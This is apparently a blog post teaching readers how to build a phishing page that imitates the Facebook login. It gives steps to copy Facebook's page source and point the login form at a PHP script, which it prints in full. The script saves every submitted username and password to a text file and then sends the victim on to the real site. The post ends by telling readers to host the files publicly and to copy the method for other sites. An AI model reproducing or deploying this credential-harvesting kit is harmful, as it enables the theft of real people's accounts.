What is Phishing?
Phishing is a Fake Login Page Which Looks Like
Real Facebook Login Page. It is Designed By Hackers to Get Login Details of Victim.
How to Make a Phishing Page?
- Go to Facebook, Right Click anywhere on the site and Click on “View Page Source”.
- Copy the entire Source and Paste it in Notepad.
- Search for the Word “action” Better to Type Ctrl + F and Search for it.
- Find Text which Look Like: Action="https://www.facebook.com/login.php?login_attempt=1"
- Replace https://www.facebook.com/login.php?login_attempt=1 with Facebook.php and Save it as Index.htm not Index.html.
- Again open Notepad and Paste the Given Below Coding in Notepad and Save it as “Facebook.php”.
<?phpheader("Location: http://www.Facebook.com/ ");$handle = fopen("Passwords.txt", "a");foreach($_POST as $variable => $value) {fwrite($handle, $variable);fwrite($handle, "=");fwrite($handle, $value);fwrite($handle, "\r\n");}fwrite($handle, "\r\n");fclose($handle);exit;?>
- Again open Notepad and write Nothing and Save it as “Passwords.txt”.
Now, You have Successfully Created a Phishing
Page. Now, Just Go to any Free Web Hosting Site and upload Phishing Files In
Public_html Folder With File Manager.
Similarly, You Can Make Phishing Pages For other Sites.
Similarly, You Can Make Phishing Pages For other Sites.
0 Comments:
Post a Comment